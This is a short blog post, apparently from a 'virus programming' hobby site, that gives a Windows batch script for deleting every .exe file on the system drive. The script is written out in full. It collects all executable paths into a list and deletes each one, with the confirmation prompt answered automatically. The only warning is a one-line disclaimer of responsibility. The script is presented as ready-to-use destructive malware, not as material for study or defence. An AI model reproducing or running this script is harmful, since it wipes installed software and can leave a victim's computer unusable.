// Place side add here
Virus Programming/Batch File Programming
Internet Tips
Hacking Stuff
Useful Softwares
AntiVirus and Security Tips

Batch code to Delete all exe's from a computer



rem ---------------------------------
rem Delete All Exe
DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
rem ---------------------------------




[Note: Be careful in using these scripts, i will not be responsible if you damage your system.]
author

Written by:

Surbhi is Founder of Techbyte4u.com. Follow her on Twitter or email her

Bookmark and Share

0 comments for this post

Leave a reply

TechByte4U on FaceBook
Videos on Tech Byte 4 U